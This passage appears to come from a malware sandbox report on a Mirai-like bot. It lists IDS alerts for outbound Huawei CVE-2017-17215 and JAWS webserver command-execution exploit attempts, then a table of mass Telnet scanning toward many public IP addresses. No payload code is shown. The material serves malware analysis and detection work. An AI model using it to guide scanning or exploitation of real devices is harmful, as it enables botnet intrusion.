                                                          2025-02-04T18:11:49.066672+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.154399041.218.164.9637215TCP
                                                          2025-02-04T18:11:49.067685+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.155410041.46.173.3537215TCP
                                                          2025-02-04T18:11:49.068083+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1553268197.66.30.11537215TCP
                                                          2025-02-04T18:11:49.068167+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.154156841.238.198.6537215TCP
                                                          2025-02-04T18:11:49.069516+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1544650156.214.132.16837215TCP
                                                          2025-02-04T18:11:49.069846+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1542568197.36.149.9637215TCP
                                                          2025-02-04T18:11:49.071676+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.155888041.18.226.2937215TCP
                                                          2025-02-04T18:11:49.237715+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1536338121.240.223.25380TCP
                                                          2025-02-04T18:11:49.237715+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1536338121.240.223.25380TCP
                                                          2025-02-04T18:11:49.239566+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.15509621.198.0.18380TCP
                                                          2025-02-04T18:11:49.239566+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.15509621.198.0.18380TCP
                                                          2025-02-04T18:11:49.257908+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1554824149.23.206.24480TCP
                                                          2025-02-04T18:11:49.257908+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1554824149.23.206.24480TCP
                                                          2025-02-04T18:11:49.259114+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.15383385.194.208.13380TCP
                                                          2025-02-04T18:11:49.259114+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.15383385.194.208.13380TCP
                                                          2025-02-04T18:11:49.290571+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.153580644.91.54.1380TCP
                                                          2025-02-04T18:11:49.290571+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.153580644.91.54.1380TCP
                                                          2025-02-04T18:11:50.050135+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1548220197.240.250.337215TCP
                                                          2025-02-04T18:11:50.064019+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1541518156.11.101.22837215TCP
                                                          2025-02-04T18:11:50.064026+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.156076441.120.96.21137215TCP
                                                          2025-02-04T18:11:50.064884+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1558036156.113.150.1237215TCP
                                                          2025-02-04T18:11:50.065667+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1544554156.215.191.8037215TCP
                                                          2025-02-04T18:11:50.065983+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1539368197.140.151.12937215TCP
                                                          2025-02-04T18:11:50.066127+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.153632441.215.202.6737215TCP
                                                          2025-02-04T18:11:50.070746+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1540472197.145.133.21337215TCP
                                                          2025-02-04T18:11:50.071038+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.153387041.182.224.2437215TCP
                                                          2025-02-04T18:11:50.081359+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.153867641.174.162.15037215TCP
                                                          2025-02-04T18:11:50.081543+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1540846197.36.190.16037215TCP
                                                          2025-02-04T18:11:50.083435+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1553598156.182.235.15737215TCP
                                                          2025-02-04T18:11:50.085886+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1555220156.51.228.21437215TCP
                                                          2025-02-04T18:11:50.095127+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.155973441.196.83.10637215TCP
                                                          2025-02-04T18:11:50.095219+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1540192197.193.66.16737215TCP
                                                          2025-02-04T18:11:50.096011+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1533032156.54.150.13337215TCP
                                                          2025-02-04T18:11:50.097020+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1554882197.35.168.16837215TCP
                                                          2025-02-04T18:11:50.099396+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.153781041.98.45.22337215TCP
                                                          2025-02-04T18:11:50.101396+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.155171841.227.108.8137215TCP
                                                          2025-02-04T18:11:50.239651+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.153503632.158.13.25280TCP
                                                          2025-02-04T18:11:50.239651+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.153503632.158.13.25280TCP
                                                          2025-02-04T18:11:50.805332+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1549734197.215.149.14337215TCP
                                                          2025-02-04T18:11:51.064130+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.153676841.226.106.7837215TCP
                                                          2025-02-04T18:11:51.079712+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.154986241.133.59.9937215TCP
                                                          2025-02-04T18:11:51.083769+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1554470197.128.142.3037215TCP
                                                          2025-02-04T18:11:51.097454+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1534244156.46.215.10337215TCP
                                                          2025-02-04T18:11:51.097459+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.155381641.119.236.2137215TCP
                                                          2025-02-04T18:11:51.101065+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1557464156.156.184.7337215TCP
                                                          2025-02-04T18:11:51.101149+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.155960641.245.10.18937215TCP
                                                          2025-02-04T18:11:51.117203+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1556184197.243.14.23837215TCP
                                                          2025-02-04T18:11:51.117998+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1550666197.30.141.5837215TCP
                                                          2025-02-04T18:11:51.290778+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.154777276.93.228.10380TCP
                                                          2025-02-04T18:11:51.290778+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.154777276.93.228.10380TCP
                                                          2025-02-04T18:11:51.319108+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1551758197.6.58.5137215TCP
                                                          2025-02-04T18:11:52.142320+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1538758156.228.59.24337215TCP
                                                          2025-02-04T18:11:52.142430+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1535412156.27.33.19037215TCP
                                                          2025-02-04T18:11:52.142500+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1535776197.129.167.2737215TCP
                                                          2025-02-04T18:11:52.142651+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1557014156.213.195.23137215TCP
                                                          2025-02-04T18:11:52.144013+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.154080041.132.7.11137215TCP
                                                          2025-02-04T18:11:52.144014+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1537072156.141.92.15437215TCP
                                                          2025-02-04T18:11:52.144139+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1535546156.28.127.12237215TCP
                                                          2025-02-04T18:11:52.144268+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1557962197.126.110.19037215TCP
                                                          2025-02-04T18:11:52.144579+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1532832156.31.61.10837215TCP
                                                          2025-02-04T18:11:52.145879+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.155074041.234.28.7937215TCP
                                                          2025-02-04T18:11:52.146199+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1534142197.181.221.18937215TCP
                                                          2025-02-04T18:11:52.147700+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1553150197.249.221.10037215TCP
                                                          2025-02-04T18:11:52.147930+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.155266241.136.226.23737215TCP
                                                          2025-02-04T18:11:52.148099+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1553318197.211.188.22537215TCP
                                                          2025-02-04T18:11:52.160189+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1538226197.55.241.3637215TCP
                                                          2025-02-04T18:11:52.163338+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.155737841.87.45.4537215TCP
                                                          2025-02-04T18:11:52.236750+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1534116197.234.83.11337215TCP
                                                          2025-02-04T18:11:52.236751+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1537698143.146.138.16880TCP
                                                          2025-02-04T18:11:52.236751+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1537698143.146.138.16880TCP
                                                          2025-02-04T18:11:52.236752+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1546400187.17.238.10080TCP
                                                          2025-02-04T18:11:52.236752+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1546400187.17.238.10080TCP
                                                          2025-02-04T18:11:52.238257+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.156037042.15.218.9780TCP
                                                          2025-02-04T18:11:52.238257+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.156037042.15.218.9780TCP
                                                          2025-02-04T18:11:52.240099+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1537954152.212.91.5980TCP
                                                          2025-02-04T18:11:52.240099+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1537954152.212.91.5980TCP
                                                          2025-02-04T18:11:52.274944+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1560098116.188.200.17380TCP
                                                          2025-02-04T18:11:52.274944+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1560098116.188.200.17380TCP
                                                          2025-02-04T18:11:52.288547+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.153803420.106.247.17380TCP
                                                          2025-02-04T18:11:52.288547+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.153803420.106.247.17380TCP
                                                          2025-02-04T18:11:53.141477+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.154201241.64.149.18437215TCP
                                                          2025-02-04T18:11:53.142196+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1535616156.36.152.18337215TCP
                                                          2025-02-04T18:11:53.142274+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1556642197.135.112.12237215TCP
                                                          2025-02-04T18:11:53.142772+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.153837441.250.33.10037215TCP
                                                          2025-02-04T18:11:53.142846+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.153907841.140.131.21537215TCP
                                                          2025-02-04T18:11:53.143831+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1547066156.20.100.11537215TCP
                                                          2025-02-04T18:11:53.144008+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.154953241.176.35.5537215TCP
                                                          2025-02-04T18:11:53.144019+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1560586156.103.35.18437215TCP
                                                          2025-02-04T18:11:53.144133+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1546452197.61.155.21137215TCP
                                                          2025-02-04T18:11:53.144270+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.154823441.210.2.24137215TCP
                                                          2025-02-04T18:11:53.144298+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.155622641.240.131.19637215TCP
                                                          2025-02-04T18:11:53.144313+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1547470197.254.99.8337215TCP
                                                          2025-02-04T18:11:53.144840+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1537714156.220.75.24637215TCP
                                                          2025-02-04T18:11:53.146036+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.155043641.159.35.8837215TCP
                                                          2025-02-04T18:11:53.146324+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1546592156.127.55.17137215TCP
                                                          2025-02-04T18:11:53.157808+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1539420156.85.233.4037215TCP
                                                          2025-02-04T18:11:53.157874+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1544752156.138.212.2037215TCP
                                                          2025-02-04T18:11:53.157993+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.155236041.110.170.23937215TCP
                                                          2025-02-04T18:11:53.160491+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1541710197.139.199.10637215TCP
                                                          2025-02-04T18:11:53.160497+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.153338241.50.215.9337215TCP
                                                          2025-02-04T18:11:53.160543+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.153824441.33.245.9337215TCP
                                                          2025-02-04T18:11:53.160638+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1555346156.89.99.8837215TCP
                                                          2025-02-04T18:11:53.160866+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.154867041.148.175.2937215TCP
                                                          2025-02-04T18:11:53.161910+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1546462156.195.120.237215TCP
                                                          2025-02-04T18:11:53.163883+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1560406156.7.78.7737215TCP
                                                          2025-02-04T18:11:53.163949+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1546138156.46.96.6137215TCP
                                                          2025-02-04T18:11:53.179463+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1553704156.68.88.22037215TCP
                                                          2025-02-04T18:11:53.179524+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1546522197.141.228.21537215TCP
                                                          2025-02-04T18:11:53.179937+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1557970197.173.111.13637215TCP
                                                          2025-02-04T18:11:53.251913+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.155660840.206.98.12080TCP
                                                          2025-02-04T18:11:53.251913+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.155660840.206.98.12080TCP
                                                          2025-02-04T18:11:53.269463+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1548844163.146.97.22180TCP
                                                          2025-02-04T18:11:53.269463+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1548844163.146.97.22180TCP
                                                          2025-02-04T18:11:53.269492+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1545230105.218.189.22280TCP
                                                          2025-02-04T18:11:53.269492+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1545230105.218.189.22280TCP
                                                          2025-02-04T18:11:53.273571+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.154932672.125.5.12480TCP
                                                          2025-02-04T18:11:53.273571+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.154932672.125.5.12480TCP
                                                          2025-02-04T18:11:53.276671+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.155610451.155.163.2180TCP
                                                          2025-02-04T18:11:53.276671+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.155610451.155.163.2180TCP
                                                          2025-02-04T18:11:53.288703+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1552884201.191.230.9580TCP
                                                          2025-02-04T18:11:53.288703+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1552884201.191.230.9580TCP
                                                          2025-02-04T18:11:54.283086+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.153456886.223.23.11280TCP
                                                          2025-02-04T18:11:54.283086+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.153456886.223.23.11280TCP
                                                          2025-02-04T18:11:54.283592+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.153735664.172.203.18880TCP
                                                          2025-02-04T18:11:54.283592+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.153735664.172.203.18880TCP
                                                          2025-02-04T18:11:54.302322+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.154548431.162.52.080TCP
                                                          2025-02-04T18:11:54.302322+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.154548431.162.52.080TCP
                                                          2025-02-04T18:11:54.304384+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1552140216.199.168.7380TCP
                                                          2025-02-04T18:11:54.304384+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1552140216.199.168.7380TCP
                                                          2025-02-04T18:11:54.321789+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1552674108.16.63.23380TCP
                                                          2025-02-04T18:11:54.321789+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1552674108.16.63.23380TCP
                                                          2025-02-04T18:11:55.173660+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.154070641.200.32.8237215TCP
                                                          2025-02-04T18:11:55.175193+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.155816041.127.12.437215TCP
                                                          2025-02-04T18:11:55.179460+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1539384197.253.89.23537215TCP
                                                          2025-02-04T18:11:55.794475+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1537508156.239.255.15637215TCP
                                                          • Total Packets: 15116
                                                          • 59666 undefined
                                                          • 37215 undefined
                                                          • 80 (HTTP)
                                                          • 23 (Telnet)
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Feb 4, 2025 18:11:15.278866053 CET1064523192.168.2.15129.98.8.49
                                                          Feb 4, 2025 18:11:15.278903008 CET1064523192.168.2.15200.146.125.49
                                                          Feb 4, 2025 18:11:15.278915882 CET1064523192.168.2.15170.144.61.73
                                                          Feb 4, 2025 18:11:15.278913021 CET1064523192.168.2.15150.92.232.7
                                                          Feb 4, 2025 18:11:15.278913021 CET1064523192.168.2.15120.162.219.46
                                                          Feb 4, 2025 18:11:15.278913975 CET1064523192.168.2.1531.166.118.47
                                                          Feb 4, 2025 18:11:15.278938055 CET1064523192.168.2.15140.167.23.67
                                                          Feb 4, 2025 18:11:15.278938055 CET1064523192.168.2.15199.182.0.76
                                                          Feb 4, 2025 18:11:15.278938055 CET1064523192.168.2.15161.154.40.2
                                                          Feb 4, 2025 18:11:15.278939009 CET1064523192.168.2.15177.70.98.184
                                                          Feb 4, 2025 18:11:15.278969049 CET1064523192.168.2.1582.185.240.35
                                                          Feb 4, 2025 18:11:15.278979063 CET1064523192.168.2.1577.77.83.106
                                                          Feb 4, 2025 18:11:15.278984070 CET1064523192.168.2.1571.253.136.106
                                                          Feb 4, 2025 18:11:15.279001951 CET1064523192.168.2.159.132.198.210
                                                          Feb 4, 2025 18:11:15.279000998 CET1064523192.168.2.1523.180.33.1
                                                          Feb 4, 2025 18:11:15.279001951 CET1064523192.168.2.1544.89.104.81
                                                          Feb 4, 2025 18:11:15.279017925 CET1064523192.168.2.15180.208.106.117
                                                          Feb 4, 2025 18:11:15.279025078 CET1064523192.168.2.15171.253.49.21
                                                          Feb 4, 2025 18:11:15.279025078 CET1064523192.168.2.15223.251.166.239
                                                          Feb 4, 2025 18:11:15.279026985 CET1064523192.168.2.15168.197.36.50
                                                          Feb 4, 2025 18:11:15.279033899 CET1064523192.168.2.15190.182.109.88
                                                          Feb 4, 2025 18:11:15.279051065 CET1064523192.168.2.15180.78.103.148
                                                          Feb 4, 2025 18:11:15.279055119 CET1064523192.168.2.1546.250.175.108
                                                          Feb 4, 2025 18:11:15.279063940 CET1064523192.168.2.1544.155.228.66
                                                          Feb 4, 2025 18:11:15.279066086 CET1064523192.168.2.15122.50.163.119
                                                          Feb 4, 2025 18:11:15.279067993 CET1064523192.168.2.15136.55.42.11
                                                          Feb 4, 2025 18:11:15.279073954 CET1064523192.168.2.15154.85.65.46
                                                          Feb 4, 2025 18:11:15.279082060 CET1064523192.168.2.15200.196.8.211
                                                          Feb 4, 2025 18:11:15.279083967 CET1064523192.168.2.15164.142.192.207
                                                          Feb 4, 2025 18:11:15.279103994 CET1064523192.168.2.15165.249.38.136
                                                          Feb 4, 2025 18:11:15.279104948 CET1064523192.168.2.15143.239.97.29
                                                          Feb 4, 2025 18:11:15.279105902 CET1064523192.168.2.15180.224.139.179
                                                          Feb 4, 2025 18:11:15.279107094 CET1064523192.168.2.15164.137.162.251
                                                          Feb 4, 2025 18:11:15.279112101 CET1064523192.168.2.15187.150.12.11
                                                          Feb 4, 2025 18:11:15.279113054 CET1064523192.168.2.1513.201.182.230
                                                          Feb 4, 2025 18:11:15.279143095 CET1064523192.168.2.15206.244.37.21
                                                          Feb 4, 2025 18:11:15.279145956 CET1064523192.168.2.15218.238.190.219
                                                          Feb 4, 2025 18:11:15.279149055 CET1064523192.168.2.15104.129.170.155
                                                          Feb 4, 2025 18:11:15.279148102 CET1064523192.168.2.1575.64.20.205
                                                          Feb 4, 2025 18:11:15.279149055 CET1064523192.168.2.1553.219.214.78
                                                          Feb 4, 2025 18:11:15.279150963 CET1064523192.168.2.1571.140.188.144
                                                          Feb 4, 2025 18:11:15.279150963 CET1064523192.168.2.15138.119.215.28
                                                          Feb 4, 2025 18:11:15.279170990 CET1064523192.168.2.15183.158.88.190
                                                          Feb 4, 2025 18:11:15.279177904 CET1064523192.168.2.15130.70.56.197
                                                          Feb 4, 2025 18:11:15.279181004 CET1064523192.168.2.1580.194.220.75
                                                          Feb 4, 2025 18:11:15.279181004 CET1064523192.168.2.1594.86.77.0
                                                          Feb 4, 2025 18:11:15.279191017 CET1064523192.168.2.15212.98.151.177
                                                          Feb 4, 2025 18:11:15.279202938 CET1064523192.168.2.1535.128.194.32
                                                          Feb 4, 2025 18:11:15.279202938 CET1064523192.168.2.15128.125.86.157
                                                          Feb 4, 2025 18:11:15.279206991 CET1064523192.168.2.15135.64.29.32
                                                          Feb 4, 2025 18:11:15.279207945 CET1064523192.168.2.15157.105.102.148
                                                          Feb 4, 2025 18:11:15.279238939 CET1064523192.168.2.1594.227.241.132
                                                          Feb 4, 2025 18:11:15.279242039 CET1064523192.168.2.15209.173.21.234
                                                          Feb 4, 2025 18:11:15.279242992 CET1064523192.168.2.1537.106.63.8
                                                          Feb 4, 2025 18:11:15.279246092 CET1064523192.168.2.15129.9.229.69
                                                          Feb 4, 2025 18:11:15.279247046 CET1064523192.168.2.15108.249.165.250
                                                          Feb 4, 2025 18:11:15.279267073 CET1064523192.168.2.15132.130.1.67
                                                          Feb 4, 2025 18:11:15.279269934 CET1064523192.168.2.15132.15.159.73
                                                          Feb 4, 2025 18:11:15.279274940 CET1064523192.168.2.1591.0.19.87
                                                          Feb 4, 2025 18:11:15.279285908 CET1064523192.168.2.15153.195.245.31
                                                          Feb 4, 2025 18:11:15.279285908 CET1064523192.168.2.15179.180.114.19
                                                          Feb 4, 2025 18:11:15.279297113 CET1064523192.168.2.1545.119.106.189
                                                          Feb 4, 2025 18:11:15.279299021 CET1064523192.168.2.1557.205.39.29
                                                          Feb 4, 2025 18:11:15.279325008 CET1064523192.168.2.15103.187.98.3
                                                          Feb 4, 2025 18:11:15.279325008 CET1064523192.168.2.15178.240.68.167
                                                          Feb 4, 2025 18:11:15.279337883 CET1064523192.168.2.15184.200.125.10
                                                          Feb 4, 2025 18:11:15.279340029 CET1064523192.168.2.15108.109.210.172
                                                          Feb 4, 2025 18:11:15.279341936 CET1064523192.168.2.15201.160.33.69
                                                          Feb 4, 2025 18:11:15.279350042 CET1064523192.168.2.15180.109.28.208
                                                          Feb 4, 2025 18:11:15.279351950 CET1064523192.168.2.15148.9.7.97
                                                          Feb 4, 2025 18:11:15.279356003 CET1064523192.168.2.1561.216.233.236
                                                          Feb 4, 2025 18:11:15.279356003 CET1064523192.168.2.15120.64.224.218
                                                          Feb 4, 2025 18:11:15.279361010 CET1064523192.168.2.15211.5.82.30
                                                          Feb 4, 2025 18:11:15.279377937 CET1064523192.168.2.1583.203.152.236
                                                          Feb 4, 2025 18:11:15.279377937 CET1064523192.168.2.1523.235.121.239
                                                          Feb 4, 2025 18:11:15.279377937 CET1064523192.168.2.15180.35.33.201
                                                          Feb 4, 2025 18:11:15.279406071 CET1064523192.168.2.15112.84.19.109
                                                          Feb 4, 2025 18:11:15.279407024 CET1064523192.168.2.15148.177.1.189
                                                          Feb 4, 2025 18:11:15.279407978 CET1064523192.168.2.1536.176.57.6
                                                          Feb 4, 2025 18:11:15.279412031 CET1064523192.168.2.1568.111.155.67
                                                          Feb 4, 2025 18:11:15.279414892 CET1064523192.168.2.1583.221.63.72
                                                          Feb 4, 2025 18:11:15.279414892 CET1064523192.168.2.15146.120.87.140
                                                          Feb 4, 2025 18:11:15.279416084 CET1064523192.168.2.1518.7.3.199
                                                          Feb 4, 2025 18:11:15.279418945 CET1064523192.168.2.1594.164.192.93
                                                          Feb 4, 2025 18:11:15.279444933 CET1064523192.168.2.15158.149.137.73
                                                          Feb 4, 2025 18:11:15.279450893 CET1064523192.168.2.15121.30.131.180
                                                          Feb 4, 2025 18:11:15.279452085 CET1064523192.168.2.1517.83.44.167
